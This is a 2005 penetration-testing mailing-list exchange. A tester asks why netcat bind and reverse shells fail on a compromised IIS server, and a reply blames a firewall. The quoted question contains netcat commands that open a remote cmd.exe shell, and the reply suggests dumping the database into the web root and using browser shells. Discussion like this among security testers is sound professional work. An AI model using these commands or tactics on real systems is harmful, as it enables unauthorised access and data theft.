RE: Netcat Question

[Meidinger Chris <chris.meidinger () badenit de>]

Hi Intel,

I assume there is a firewall is between you and the webserver? That would be
a pretty logical explanation of why you can't access your bindshell.

If i were you, i would upload a script, have that script run locally to dump
the database and place the results in a folder in wwwroot. Then you can pick
it up with your browser.

If you want to get tricky, you should find a couple of .net applications
that act as browser shells.

But remember: unless you are combined testing incident response and
penetration you *don't* want to trip IDS. outbound connections from a web
server to a silly internet host on port 8000(!) are a dead giveaway for a
properly tuned IDS or a decent firewall admin. Don't be suprised if you get
blackholed.

Cheers,

Chris


> -----Original Message-----
> From: intel96 [mailto:intel96 () bellsouth net] 
> Sent: Wednesday, June 01, 2005 12:39 AM
> To: pen-test () securityfocus com
> Subject: Netcat Question
>
> To All,
>
> I am conducting a pentest and I have been able to upload 
> netcat to the 
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have 
> tried to 
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a 
> timeout on my side. I have also tried this with port 53 and 
> it also did 
> not work.
>
> I than tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe
>
> This did not work either. I did not see the remote system trying to 
> connect to my system via my logs. I have access to upload anything to 
> the system and run most commands via sql injections. I have 
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or there any other 
> commands that may provide me more access or allow me to dump 
> the database?
>
> Thanks,
>
> Intel96